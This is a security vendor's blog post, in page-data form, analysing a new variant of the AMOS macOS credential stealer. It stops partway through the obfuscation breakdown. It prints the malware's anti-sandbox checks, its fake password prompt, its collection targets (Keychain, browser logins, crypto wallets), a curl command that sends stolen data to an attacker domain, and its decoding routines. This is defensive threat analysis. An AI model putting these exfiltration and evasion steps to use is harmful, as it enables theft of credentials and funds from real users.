[{"data":1,"prerenderedAt":22857},["ShallowReactive",2],{"post-es-/posts/2026-04-10-incident-to-intelligence":3,"authors_data":2274,"content-es-posts-d887737123081":2613},{"id":4,"title":5,"author":6,"body":8,"cta":2165,"description":14,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2169,"moment":2173,"navigation":2180,"path":2264,"seo":2265,"stem":2266,"tags":2267,"webcast":2167,"__hash__":2273},"content_es/posts/2026-04-10-incident-to-intelligence.md","Anatomy of an unknown AMOS Stealer: from alert to immunity in hours",[7],"Pascal Asch",{"type":9,"value":10,"toc":2129},"minimal",[11,15,18,21,24,29,32,35,38,40,45,48,51,66,69,72,80,83,87,89,92,115,118,126,129,137,144,148,150,153,161,176,180,182,185,190,193,201,205,207,215,219,221,224,228,230,233,241,245,247,255,258,356,359,389,391,395,397,404,407,411,413,497,501,503,514,521,595,606,613,617,619,684,688,690,697,699,703,705,712,738,928,931,939,950,953,961,976,989,991,995,997,1015,1037,1226,1229,1237,1240,1243,1245,1249,1251,1254,1333,1336,1355,1434,1437,1439,1443,1445,1448,1455,1510,1513,1521,1524,1526,1530,1532,1539,1552,1600,1611,1650,1659,1674,1677,1679,1683,1685,1692,1695,1703,1706,1714,1728,1731,1733,1737,1739,1749,1753,1755,1773,1781,1795,1815,1819,1821,1824,1832,1835,1843,1857,1861,1863,1866,1874,1892,1897,1901,1903,1911,1918,1925,1929,1931,1939,1943,1945,1948,1956,1959,1963,1965,1973,1977,1979,1987,1991,1993,2001,2005,2007,2015,2036,2041,2043,2047,2049,2056,2073,2076,2089,2091,2095,2097,2100,2103,2106,2108,2125],[12,13,14],"p",{},"When an alert fires in our SOC, the clock starts ticking. Not only for the affected client, but for every client we protect. 
In today's threat landscape, the most dangerous moment for any organization is the intelligence gap: the window of time between the deployment of a new malware variant and the moment the rest of the world learns that it exists.",[12,16,17],{},"For a stand-alone security team, this gap is a period of extreme vulnerability: in essence, you are waiting for a vendor update or a public signature feed that does not exist yet. For our clients, that gap is closed by our in-house Shared Threat Intelligence platform.",[12,19,20],{},"This blog post is the technical breakdown of how we dismantled a previously undocumented variant of AMOS (Atomic macOS Stealer). It is the story of how a single compromised endpoint turns into the rapid deployment of detection and blocking capabilities across client environments.",[22,23],"hr",{},[25,26,28],"h1",{"id":27},"el-incidente-un-escenario-con-ioc-desconocido","The incident: a scenario with unknown IOCs",[12,30,31],{},"",[12,33,34],{},"The alert arrived on 12 March 2026 at 06:25 local time. A macOS endpoint had been compromised. When our SOC started analyzing the artifacts, we faced the situation every threat analyst dreads: no known file hash, no C2 IP address and no relevant behavioral signature existed in public databases at the time of detection.",[12,36,37],{},"The full architecture of the attack only became clear during the subsequent in-depth analysis. We found that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. 
This sample was not directly available on the system; our team had to reconstruct the infection chain and replay the original delivery request to manually retrieve the binary from the attacker's infrastructure.",[22,39],{},[41,42,44],"h2",{"id":43},"stage-1-comprobaciones-de-sandbox","Stage 1: Sandbox checks",[12,46,47],{},"",[12,49,50],{},"Before the stealer itself ran on the machine, an AppleScript payload had already executed. Every string, every file path, every shell command, every URL was encoded with three custom arithmetic functions:",[52,53,55],"div",{"style":54},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[56,57,62],"pre",{"className":58,"code":60,"language":61},[59],"language-text","on ipbgcjzgqa(a, b)\n    -- result[i] = chr(a[i] - b[i])\n    \non kwcvvjininv(a, b)\n    -- result[i] = chr(a[i] + b[i])\n    \non xqylheckjx(a, b, offset)\n    -- result[i] = chr(a[i] - b[i] - offset)\n","text",[63,64,60],"code",{"__ignoreMap":65},"",[12,67,68],{},"None of the strings appears in plaintext anywhere. What at first glance looked like meaningless integer arrays decoded, once the encoding scheme was reversed, into a complete and fully operational data theft and exfiltration framework.",[12,70,71],{},"We statically decoded every array in the script. 
The results were unambiguous:",[52,73,74],{"style":54},[56,75,78],{"className":76,"code":77,"language":61},[59],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[63,79,77],{"__ignoreMap":65},[12,81,82],{},"The download URL was deliberately crafted to impersonate a legitimate update of n8n workflow automation, a tool widely used by developers and DevOps engineers. That is not a random choice. It points to a campaign aimed at technically sophisticated users, not at generic users who might install pirated software.",[41,84,86],{"id":85},"la-comprobación-anti-sandbox","The anti-sandbox check",[12,88,47],{},[12,90,91],{},"Before any download took place, the script ran a dedicated VM and sandbox detection routine. We also recovered a stand-alone anti-sandbox script from the incident:",[52,93,94],{"style":54},[56,95,99],{"className":96,"code":97,"language":98,"meta":65,"style":65},"language-applescript shiki shiki-themes github-light github-dark","set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[63,100,101,109],{"__ignoreMap":65},[102,103,106],"span",{"class":104,"line":105},"line",1,[102,107,108],{},"set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\n",[102,110,112],{"class":104,"line":111},2,[102,113,114],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[12,116,117],{},"The results were checked against two lists. 
The first looked for virtualization markers in the memory data:",[52,119,120],{"style":54},[56,121,124],{"className":122,"code":123,"language":61},[59],"\"QEMU\"   \"VMware\"   \"KVM\"\n",[63,125,123],{"__ignoreMap":65},[12,127,128],{},"The second checked the hardware identifiers against a set of known serial numbers of analysis machines:",[52,130,131],{"style":54},[56,132,135],{"className":133,"code":134,"language":61},[59],"\"Z31FHXYQ0J\"     -- known sandbox machine serial\n\"C07T508TG1J2\"   -- known sandbox machine serial  \n\"C02TM2ZBHX87\"   -- known sandbox machine serial\n\"Chip: Unknown\"  -- emulation indicator\n\"Intel Core 2\"   -- legacy/VM indicator\n",[63,136,134],{"__ignoreMap":65},[12,138,139,140,143],{},"If any match was found: ",[63,141,142],{},"exit 100",", full termination. On a real MacBook Pro with an Apple Silicon chip, every check passes silently and execution continues. This is professional-grade sandbox evasion, already in motion before a single byte of the binary was downloaded.",[41,145,147],{"id":146},"escalada-de-privilegios-simple-pero-efectiva-el-diálogo-de-contraseña-falso","Simple but effective privilege escalation: the fake password dialog",[12,149,47],{},[12,151,152],{},"The decoded script also contained the text used for privilege escalation through social engineering:",[52,154,155],{"style":54},[56,156,159],{"className":157,"code":158,"language":61},[59],"Title:   \"Application wants to install helper\"\nPrompt:  \"Required Application Helper. 
Please enter device\n          password to continue.\"\nButton:  \"Continue\"\n",[63,160,158],{"__ignoreMap":65},[12,162,163,164,167,168,171,172,175],{},"This dialog is displayed through a standard macOS ",[63,165,166],{},"display dialog"," call with ",[63,169,170],{},"with hidden answer",", visually indistinguishable from a legitimate macOS authorization prompt. The entered password was used to invoke ",[63,173,174],{},"login -pf \u003Cusername>",", elevating the process to root before the binary was executed.",[41,177,179],{"id":178},"qué-recopiló-el-script","What the script collected",[12,181,47],{},[12,183,184],{},"Once the binary had run, the osascript continued its own collection flow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:",[186,187,189],"h3",{"id":188},"datos-del-navegador-todos-los-navegadores-chromium-safari","Browser data (all Chromium browsers + Safari):",[12,191,192],{},"",[52,194,195],{"style":54},[56,196,199],{"className":197,"code":198,"language":61},[59],"/Login Data          /Cookies            /Web Data\n/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/\n",[63,200,198],{"__ignoreMap":65},[186,202,204],{"id":203},"macos-keychain","macOS Keychain:",[12,206,192],{},[52,208,209],{"style":54},[56,210,213],{"className":211,"code":212,"language":61},[59],"~/Library/Keychains/login.keychain-db  -- accessed directly via cat\n",[63,214,212],{"__ignoreMap":65},[186,216,218],{"id":217},"apple-notes","Apple Notes",[12,220,192],{},[12,222,223],{},"Full contents exported as HTML with a count header",[186,225,227],{"id":226},"archivos-locales","Local files",[12,229,192],{},[12,231,232],{},"Desktop and Documents, up to 30 MB, with the following targets:",[52,234,235],{"style":54},[56,236,239],{"className":237,"code":238,"language":61},[59],"pdf  doc  docx  xls  xlsx  ppt  
pptx  txt  rtf\nkey  p12  pem  cert  pfx  sql  db  sqlite\njson  xml  yaml  conf  env  csv\n",[63,240,238],{"__ignoreMap":65},[186,242,244],{"id":243},"carteras-de-criptomonedas","Cryptocurrency wallets",[12,246,192],{},[12,248,249,250,254],{},"An encoded list of ",[251,252,253],"strong",{},"more than 200 browser extension IDs"," targeting all major wallets, including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI and Exodus.",[12,256,257],{},"After collection, everything was staged in a randomly named temporary directory and sent:",[52,259,260],{"style":54},[56,261,265],{"className":262,"code":263,"language":264,"meta":65,"style":65},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n  -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n  -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[63,266,267,301,327,344],{"__ignoreMap":65},[102,268,269,273,277,280,283,287,291,295,298],{"class":104,"line":105},[102,270,272],{"class":271},"sScJk","ditto",[102,274,276],{"class":275},"sj4cs"," -c",[102,278,279],{"class":275}," -k",[102,281,282],{"class":275}," --sequesterRsrc",[102,284,286],{"class":285},"szBVR"," \u003C",[102,288,290],{"class":289},"sZZnC","staging_di",[102,292,294],{"class":293},"sVt8B","r",[102,296,297],{"class":285},">",[102,299,300],{"class":289}," /tmp/out.zip\n",[102,302,303,306,309,312,315,318,321,324],{"class":104,"line":111},[102,304,305],{"class":271},"curl",[102,307,308],{"class":275}," --connect-timeout",[102,310,311],{"class":275}," 120",[102,313,314],{"class":275}," --max-time",[102,316,317],{"class":275}," 300",[102,319,320],{"class":275}," -X",[102,322,323],{"class":289}," POST",[102,325,326],{"class":275}," \\\n",[102,328,330,333,336,339,342],{"class":104,"line":329},3,[102,331,332],{"class":275},"  
-H",[102,334,335],{"class":289}," \"user: \u003Cuuid>\"",[102,337,338],{"class":275}," -H",[102,340,341],{"class":289}," \"BuildID: \u003Chw_profile>\"",[102,343,326],{"class":275},[102,345,347,350,353],{"class":104,"line":346},4,[102,348,349],{"class":275},"  -F",[102,351,352],{"class":289}," \"file=@/tmp/out.zip\"",[102,354,355],{"class":289}," laislivon[.]com/contact\n",[12,357,358],{},"Cleanup followed immediately:",[52,360,361],{"style":54},[56,362,364],{"className":262,"code":363,"language":264,"meta":65,"style":65},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[63,365,366,383],{"__ignoreMap":65},[102,367,368,371,374,376,378,380],{"class":104,"line":105},[102,369,370],{"class":271},"rm",[102,372,373],{"class":275}," -r",[102,375,286],{"class":285},[102,377,290],{"class":289},[102,379,294],{"class":293},[102,381,382],{"class":285},">\n",[102,384,385,387],{"class":104,"line":111},[102,386,370],{"class":271},[102,388,300],{"class":289},[22,390],{},[25,392,394],{"id":393},"stage-2-ingeniería-inversa-del-binario-helper","Stage 2: Reverse engineering the 'helper' binary",[12,396,31],{},[12,398,399,400,403],{},"The ",[63,401,402],{},"helper"," binary is where this analysis goes deep. It is a purpose-built macOS executable, professionally obfuscated and designed to be as hard to analyze statically as possible. 
It is the part of this investigation that required the most reverse engineering effort.",[12,405,406],{},"All analysis was done in Ghidra using our custom ARM64 analysis workflow.",[41,408,410],{"id":409},"propiedades-del-archivo","File properties",[12,412,47],{},[52,414,416],{"style":415},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[417,418,420,421,420,437],"table",{"style":419},"width:100%; border-collapse: collapse; font-size: 0.85rem","\n  ",[422,423,424,425,420],"thead",{},"\n    ",[426,427,428,429,428,434,424],"tr",{},"\n      ",[430,431,433],"th",{"style":432},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Property",[430,435,436],{"style":432},"Value",[438,439,424,440,424,450,424,459,424,467,424,477,424,487,420],"tbody",{},[426,441,428,442,428,447,424],{},[443,444,446],"td",{"style":445},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Format",[443,448,449],{"style":445},"Mach-O Universal Binary",[426,451,428,452,428,456,424],{},[443,453,455],{"style":454},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Architectures",[443,457,458],{"style":454},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[426,460,428,461,428,464,424],{},[443,462,463],{"style":445},"Size",[443,465,466],{"style":445},"15.7 MB",[426,468,428,469,428,472,424],{},[443,470,471],{"style":454},"MD5",[443,473,474],{"style":454},[63,475,476],{},"4599fdf2fa2099b30d8bbf76703dd634",[426,478,428,479,428,482,424],{},[443,480,481],{"style":445},"SHA-1",[443,483,484],{"style":445},[63,485,486],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[426,488,428,489,428,492,424],{},[443,490,491],{"style":454},"SHA-256",[443,493,494],{"style":454},[63,495,496],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[41,498,500],{"id":499},"empieza-antes-de-main","It starts before 
main()",[12,502,47],{},[12,504,505,506,509,510,513],{},"The first thing we confirmed in Ghidra is that this binary does not behave like a normal executable. The real entry point is not ",[63,507,508],{},"main()",". It is a function registered in ",[63,511,512],{},"__mod_init_func",", a macOS mechanism that tells the dynamic linker (dyld) to run designated functions automatically when the binary is loaded, before any user-visible code executes.",[12,515,516,517,520],{},"The initializer function at ",[63,518,519],{},"0x10009f384"," is the malware's true entry point. We decompiled it in Ghidra:",[52,522,523],{"style":54},[524,525,526,530,533,536,540,541,545,546,548,549,552,553,567],"code-block",{},[102,527,529],{"style":528},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[531,532],"br",{},[102,534,535],{"style":528},"// __mod_init_func registered — executes before main()",[102,537,539],{"style":538},"color:#d73a49","void"," ",[102,542,544],{"style":543},"color:#6f42c1","FUN_10009f384","(",[102,547,539],{"style":538},")\n{\n  ",[102,550,551],{"style":538},"int"," iVar1;\n",[12,554,555,558,559,545,562,566],{},[102,556,557],{"style":528},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[102,560,561],{"style":543},"_usleep",[102,563,565],{"style":564},"color:#005cc5","0x37e",");",[12,568,569,572,575,576,578,579,582,583,586,587,590,591,594],{},[102,570,571],{"style":528},"// Indirect jump table — 14-state machine",[102,573,574],{"style":528},"// Defeats CFG reconstruction in static analysis tools","\n(*(",[102,577,63],{"style":538}," *)((",[102,580,581],{"style":538},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[102,584,585],{"style":564},"4","\n+ ",[102,588,589],{"style":564},"0x10009f440","))(iVar1);\n",[102,592,593],{"style":538},"return",";\n}",[12,596,597,598,601,602,605],{},"Two things stand out immediately. 
First, the ",[63,599,600],{},"usleep"," of 894 microseconds at the very start, an anti-sandbox timing signal. Second, and more relevant, the indirect jump table at ",[63,603,604],{},"0x10009f43c",". It is a computed jump whose target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control-flow graph from here, and Ghidra itself logs multiple \"unreachable block\" warnings while it tries and fails to trace the execution path. This is deliberate.",[12,607,608,609,612],{},"The jump table drives a ",[251,610,611],{},"14-state execution machine",". Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine iterates until every state has run.",[41,614,616],{"id":615},"el-desensamblado-arm64-del-despachador-de-estados","The ARM64 disassembly of the state dispatcher",[12,618,47],{},[52,620,621],{"style":54},[56,622,626],{"className":623,"code":624,"language":625,"meta":65,"style":65},"language-asm shiki shiki-themes github-light github-dark","10009f3fc:  stp xzr,xzr,[sp, #0x48]\n10009f41c:  mov w0,#0x37e\n10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n10009f428:  b.hi 0x10009fd44         ; exit if done\n10009f42c:  mov w8,w25               ; current state index\n10009f430:  adr x9,0x10009f440       ; base of jump table\n10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n10009f43c:  br x9                    ; indirect branch, CFG broken here\n","asm",[63,627,628,633,638,643,648,654,660,666,672,678],{"__ignoreMap":65},[102,629,630],{"class":104,"line":105},[102,631,632],{},"10009f3fc:  stp xzr,xzr,[sp, 
#0x48]\n",[102,634,635],{"class":104,"line":111},[102,636,637],{},"10009f41c:  mov w0,#0x37e\n",[102,639,640],{"class":104,"line":329},[102,641,642],{},"10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n",[102,644,645],{"class":104,"line":346},[102,646,647],{},"10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n",[102,649,651],{"class":104,"line":650},5,[102,652,653],{},"10009f428:  b.hi 0x10009fd44         ; exit if done\n",[102,655,657],{"class":104,"line":656},6,[102,658,659],{},"10009f42c:  mov w8,w25               ; current state index\n",[102,661,663],{"class":104,"line":662},7,[102,664,665],{},"10009f430:  adr x9,0x10009f440       ; base of jump table\n",[102,667,669],{"class":104,"line":668},8,[102,670,671],{},"10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[102,673,675],{"class":104,"line":674},9,[102,676,677],{},"10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n",[102,679,681],{"class":104,"line":680},10,[102,682,683],{},"10009f43c:  br x9                    ; indirect branch, CFG broken here\n",[41,685,687],{"id":686},"seis-capas-de-ofuscación-apiladas","Six stacked obfuscation layers",[12,689,47],{},[12,691,692,693,696],{},"The binary uses six distinct obfuscation layers, stacked and chained so that the output of each one feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the ",[63,694,695],{},"__const"," segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra down to the individual ARM64 instructions. 
Although each technique used in this binary is known in isolation, chaining them across multiple stages created a highly interdependent execution flow that considerably increased the complexity of both static and dynamic analysis.",[22,698],{},[186,700,702],{"id":701},"capa-1-codificación-de-tripletes-en-tiempo-de-compilación","Layer 1: compile-time triplet encoding",[12,704,192],{},[12,706,707,708,711],{},"No string in the binary is stored as characters; each is stored as a sequence of 12-byte arithmetic triplets. Each triplet ",[63,709,710],{},"(a, b, shift)"," encodes exactly one output character. The encoding is applied at compile time, which means no string ever exists as plaintext in the binary, not even transiently during loading.",[12,713,714,715,718,719,722,723,726,727,718,730,733,734,737],{},"Two separate decoding functions handle different string lengths. ",[63,716,717],{},"FUN_100087c08"," at ",[63,720,721],{},"0x100087c08"," decodes 60-character strings (720 bytes of input data from ",[63,724,725],{},"DAT_1006292cc","). ",[63,728,729],{},"FUN_10007ad80",[63,731,732],{},"0x10007ad80"," decodes 56-character strings (672 bytes from ",[63,735,736],{},"DAT_10049708c","). 
Both use the same algorithm.",[52,739,740],{"style":54},[524,741,742,745,747,750,540,752,545,754,757,758,760,761,763,764,766,767,770,771],{},[102,743,744],{"style":528},"// FUN_100087c08 @ 0x100087c08",[531,746],{},[102,748,749],{"style":528},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[102,751,539],{"style":538},[102,753,717],{"style":543},[102,755,756],{"style":538},"long"," *param_1)\n{\n  ",[102,759,756],{"style":538}," *plVar1;\n  ",[102,762,539],{"style":538}," *pvVar2;\n  ",[102,765,756],{"style":538}," lVar3;\n  ",[102,768,769],{"style":538},"uint"," *puVar4;\n",[12,772,773,774,545,777,780,781,786,789,790,792,793,796,798,801,802,805,806,809,810,813,814,816,817,578,819,821,822,825,826,829,830,832,833,836,837,840,841,578,844,846,847,850,851,854,856,859,860,578,862,864,865,867,868,870,871,876,877,880,881,886,887,890,891,893,894,899,900,902,903,905,906,909,910,913,914,916,917,920,922,925,926,594],{},"pvVar2 = ",[102,775,776],{"style":543},"operator_new",[102,778,779],{"style":564},"0x2d0",");           ",[102,782,783,784],{"style":528},"// allocate 720 bytes (60 triplets × 12)",[531,785],{},[102,787,788],{"style":543},"_memcpy","(pvVar2, &DAT_1006292cc, ",[102,791,779],{"style":564},"); ",[102,794,795],{"style":528},"// copy encoded triplets from __const",[531,797],{},[102,799,800],{"style":543},"FUN_1000a0840","(param_1, ",[102,803,804],{"style":564},"0x3c",", ",[102,807,808],{"style":564},"0",");        ",[102,811,812],{"style":528},"// init 60-char output buffer","\nlVar3 = ",[102,815,808],{"style":564},";\npuVar4 = (",[102,818,769],{"style":538},[102,820,756],{"style":538},")pvVar2 + ",[102,823,824],{"style":564},"8",");\n",[102,827,828],{"style":538},"do"," {\nplVar1 = (",[102,831,756],{"style":538}," *)*param_1;\n",[102,834,835],{"style":538},"if"," (-",[102,838,839],{"style":564},"1"," \u003C *(",[102,842,843],{"style":538},"char",[102,845,756],{"style":538},")param_1 + ",[102,848,849],{"style":564},"0x17",")) {\nplVar1 = 
param_1;\n}\n",[102,852,853],{"style":528},"// THE DECODE FORMULA, one character per triplet:",[531,855],{},[102,857,858],{"style":528},"// char = (((b * 3) XOR a) >> shift) - b","\n*(",[102,861,843],{"style":538},[102,863,756],{"style":538},")plVar1 + lVar3) =\n(",[102,866,843],{"style":538},")((",[102,869,551],{"style":538},")(puVar4",[102,872,873,874],{},"-",[102,875,839],{"style":564}," * ",[102,878,879],{"style":564},"3"," ^ puVar4",[102,882,873,883],{},[102,884,885],{"style":564},"2",") >> (*puVar4 & ",[102,888,889],{"style":564},"0x1f","))\n- (",[102,892,843],{"style":538},")puVar4",[102,895,896],{},[102,897,898],{"style":564},"-1",";\nlVar3 = lVar3 + ",[102,901,839],{"style":564},";\npuVar4 = puVar4 + ",[102,904,879],{"style":564},";       ",[102,907,908],{"style":528},"// advance 12 bytes — next triplet","\n} ",[102,911,912],{"style":538},"while"," (lVar3 != ",[102,915,804],{"style":564},");     ",[102,918,919],{"style":528},"// loop exactly 60 times",[531,921],{},[102,923,924],{"style":543},"operator_delete","(pvVar2);\n",[102,927,593],{"style":538},[12,929,930],{},"And the corresponding ARM64 assembly, where each instruction maps directly to one operation of the formula:",[52,932,933],{"style":54},[56,934,937],{"className":935,"code":936,"language":61},[59],"100087c48:  add x9,x20,#0x8\n100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11\n100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n                                       ; (compiler avoids MUL instruction)\n100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a\n100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12\n100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved\n100087c60:  sub w10,w10,w11           ; subtract b — final decoded character\n100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer\n100087c78:  add x8,x8,#0x1\n100087c7c:  cmp x8,#0x3c              ; loop counter vs. 
60\n100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded\n",[63,938,936],{"__ignoreMap":65},[12,940,941,942,945,946,949],{},"One detail worth attention: the multiplication ",[63,943,944],{},"b × 3"," is implemented as ",[63,947,948],{},"add w12, w11, w11, LSL #1",", a shift-and-add that avoids a multiply instruction entirely. This is a classic compiler optimization that also makes the code harder to recognize through pattern matching against signature databases.",[12,951,952],{},"The complete decoding formula:",[52,954,955],{"style":54},[56,956,959],{"className":957,"code":958,"language":61},[59],"char = ASR( (b × 3) XOR a, shift ) − b\n",[63,960,958],{"__ignoreMap":65},[12,962,963,964,967,968,971,972,975],{},"The ",[63,965,966],{},"ASR"," (arithmetic shift right) is essential. It preserves the sign bit. If the intermediate result of ",[63,969,970],{},"(b×3) XOR a"," is negative, as it frequently is, a logical shift would produce a completely different result. This is intentional, and it means that naively reimplementing the formula with ",[63,973,974],{},">>"," in a high-level language will silently produce wrong output unless signed arithmetic is handled correctly.",[12,977,978,979,981,982,984,985,988],{},"The 56-character variant ",[63,980,729],{}," is structurally identical and operates on ",[63,983,736],{}," with an iteration limit of ",[63,986,987],{},"0x38",". Both functions were confirmed live in Ghidra during this analysis.",[22,990],{},[186,992,994],{"id":993},"capa-2-codificación-de-cadenas-hexadecimales","Layer 2: hexadecimal string encoding",[12,996,192],{},[12,998,999,1000,1003,1004,718,1007,1010,1011,1014],{},"The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. 
The output of Layer 1's triplet decoding is a string of hex pairs: ",[63,1001,1002],{},"32694e5462...",". This is confirmed by the decoding function ",[63,1005,1006],{},"FUN_100000dc0",[63,1008,1009],{},"0x100000dc0",", which implements hex decoding using a lookup table at ",[63,1012,1013],{},"DAT_1007bb591",".",[12,1016,1017,1018,873,1021,805,1024,873,1027,805,1030,873,1033,1036],{},"Ghidra's decompilation shows a switch statement that maps each hex character (",[63,1019,1020],{},"0x30",[63,1022,1023],{},"0x39",[63,1025,1026],{},"0x41",[63,1028,1029],{},"0x46",[63,1031,1032],{},"0x61",[63,1034,1035],{},"0x66",") to its nibble value, assembling output bytes two characters at a time:",[52,1038,1039],{"style":54},[524,1040,1041,1044,1047,1050,1051,578,1054,1056,1057,540,1060,1062,1063,1066,1067,420,1070,540,1072,1075,1076,1079,1080,1082,1083,420,1086,540,1088,1075,1091,1079,1094,1082,1096,420,1099,420,1102,540,1104,1062,1106,540,1108,1075,1110,1079,1113,1115,1116,420,1119,540,1121,1062,1124,540,1126,1075,1129,1079,1132,1115,1134,420,1137,540,1139,1062,1142,540,1144,1147,1148,1079,1151,1115,1153,420,1156,540,1158,1062,1161,540,1163,1166,1167,1079,1170,1115,1172,420,1175,540,1177,1062,1180,540,1182,1075,1185,1079,1188,1115,1190,420,1193,540,1195,1062,1197,540,1199,1075,1201,1079,1204,1115,1206,1209,1210,859,1213,578,1216,1218,1219,1221,1222,1225],{},[102,1042,1043],{"style":528},"// FUN_100000dc0 @ 0x100000dc0",[102,1045,1046],{"style":528},"// Hex decoder, processes input two characters per output byte",[102,1048,1049],{"style":538},"switch","(*(",[102,1052,1053],{"style":538},"undefined1",[102,1055,756],{"style":538},")plVar2 + lVar7)) {\n  ",[102,1058,1059],{"style":538},"case",[102,1061,1020],{"style":564},": ",[102,1064,1065],{"style":538},"break",";                  ",[102,1068,1069],{"style":528},"// '0' → 
0x00",[102,1071,1059],{"style":538},[102,1073,1074],{"style":564},"0x31",": bVar9 = ",[102,1077,1078],{"style":564},"0x10","; ",[102,1081,1065],{"style":538},";   ",[102,1084,1085],{"style":528},"// '1' → 0x10",[102,1087,1059],{"style":538},[102,1089,1090],{"style":564},"0x32",[102,1092,1093],{"style":564},"0x20",[102,1095,1065],{"style":538},[102,1097,1098],{"style":528},"// '2' → 0x20",[102,1100,1101],{"style":528},"// ... '3' through '9' ...",[102,1103,1059],{"style":538},[102,1105,1026],{"style":564},[102,1107,1059],{"style":538},[102,1109,1032],{"style":564},[102,1111,1112],{"style":564},"0xa0",[102,1114,1065],{"style":538},";  ",[102,1117,1118],{"style":528},"// 'A'/'a' → 0xa0",[102,1120,1059],{"style":538},[102,1122,1123],{"style":564},"0x42",[102,1125,1059],{"style":538},[102,1127,1128],{"style":564},"0x62",[102,1130,1131],{"style":564},"0xb0",[102,1133,1065],{"style":538},[102,1135,1136],{"style":528},"// 'B'/'b' → 0xb0",[102,1138,1059],{"style":538},[102,1140,1141],{"style":564},"0x43",[102,1143,1059],{"style":538},[102,1145,1146],{"style":564},"99",":   bVar9 = ",[102,1149,1150],{"style":564},"0xc0",[102,1152,1065],{"style":538},[102,1154,1155],{"style":528},"// 'C'/'c' → 0xc0",[102,1157,1059],{"style":538},[102,1159,1160],{"style":564},"0x44",[102,1162,1059],{"style":538},[102,1164,1165],{"style":564},"100",":  bVar9 = ",[102,1168,1169],{"style":564},"0xd0",[102,1171,1065],{"style":538},[102,1173,1174],{"style":528},"// 'D'/'d' → 0xd0",[102,1176,1059],{"style":538},[102,1178,1179],{"style":564},"0x45",[102,1181,1059],{"style":538},[102,1183,1184],{"style":564},"0x65",[102,1186,1187],{"style":564},"0xe0",[102,1189,1065],{"style":538},[102,1191,1192],{"style":528},"// 'E'/'e' → 0xe0",[102,1194,1059],{"style":538},[102,1196,1029],{"style":564},[102,1198,1059],{"style":538},[102,1200,1035],{"style":564},[102,1202,1203],{"style":564},"0xf0",[102,1205,1065],{"style":538},[102,1207,1208],{"style":528},"// 'F'/'f' → 
0xf0","\n}\n",[102,1211,1212],{"style":528},"// Second nibble from lookup table at DAT_1007bb591",[102,1214,1215],{"style":538},"byte",[102,1217,756],{"style":538},")pppppppuVar3 + uVar8) =\n    (&DAT_1007bb591)[(",[102,1220,581],{"style":538},")uVar4 & ",[102,1223,1224],{"style":564},"0xff","] | bVar9;\n",[12,1227,1228],{},"The ARM64 assembly handles this with a second computed jump table, effectively implementing a 55-entry jump table for the switch:",[52,1230,1231],{"style":54},[56,1232,1235],{"className":1233,"code":1234,"language":61},[59],"100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table\n100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68:  br x17                   ; jump — second computed branch in 24 bytes\n",[63,1236,1234],{"__ignoreMap":65},[12,1238,1239],{},"Two computed jumps within a 24-byte window. Static analysis tools struggle badly with this pattern because both destinations are unknown at analysis time.",[12,1241,1242],{},"A 137,208-character hexadecimal string decodes to 68,604 bytes. 
